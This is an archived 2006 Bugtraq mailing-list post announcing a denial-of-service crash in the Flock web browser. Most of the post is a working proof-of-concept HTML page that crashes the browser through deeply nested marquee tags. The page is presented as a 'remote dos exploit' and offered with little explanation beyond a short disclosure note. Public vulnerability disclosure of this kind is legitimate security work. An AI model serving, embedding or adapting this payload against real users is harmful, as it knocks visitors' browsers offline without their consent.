| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060623002707.6429.qmail@securityfocus.com>
Date: 23 Jun 2006 00:27:07 -0000
From: co296@....com
To: bugtraq@...urityfocus.com
Subject: flock d0s exploit remote. beta 1 (v0.7)
Credit's to n00b..Round 2 of the marquee tag's bug...
ive found a dos in flock web browser and crash's the browser ive provided a proof of concept :P...
thnx
tested on win xp pro service pack 1..
http://www.flock.com/
<html>
<head>
<title>flox web browser remote dos exploit by n00b :: http://www.flock.com/ ::..</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<p align=center>
<font size=+3 color=red>
<marquee width=175%>
Credit's to n00b..Round {2} of the marquee bug's...
</marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</font>
</p>
</body>
</html>